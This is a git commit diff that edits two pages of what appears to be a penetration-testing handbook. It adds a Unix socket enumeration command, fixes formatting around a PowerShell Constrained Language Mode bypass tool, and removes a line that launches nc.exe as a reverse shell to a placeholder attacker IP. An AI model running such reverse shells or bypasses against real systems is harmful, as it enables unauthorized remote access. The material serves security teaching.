GitBook: [master] 2 pages modified
This commit is contained in:
parent
177537e422
commit
b4e619098f
@ -432,6 +432,12 @@ _Note that the system must be using that socket file configuration or the backdo
|
||||
|
||||
If you **identify any writable socket** \(_now where are talking about Unix Sockets, not about the config `.socket` files_\), then, **you can communicate** with that socket and maybe exploit a vulnerability.
|
||||
|
||||
### Enumerate Unix Sockets
|
||||
|
||||
```bash
|
||||
netstat -a -p --unix
|
||||
```
|
||||
|
||||
### HTTP sockets
|
||||
|
||||
Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with:
|
||||
|
@ -97,7 +97,7 @@ $ExecutionContext.SessionState.LanguageMode
|
||||
Powershell -version 2
|
||||
```
|
||||
|
||||
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll_ and **change the project to .Net4.5**.
|
||||
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**.
|
||||
|
||||
#### Direct bypass:
|
||||
|
||||
@ -226,7 +226,6 @@ Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{St
|
||||
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
||||
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
||||
$computer = "<hostname>"
|
||||
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
|
||||
```
|
||||
|
||||
## Groups
|
||||
|
Loading…
Reference in New Issue
Block a user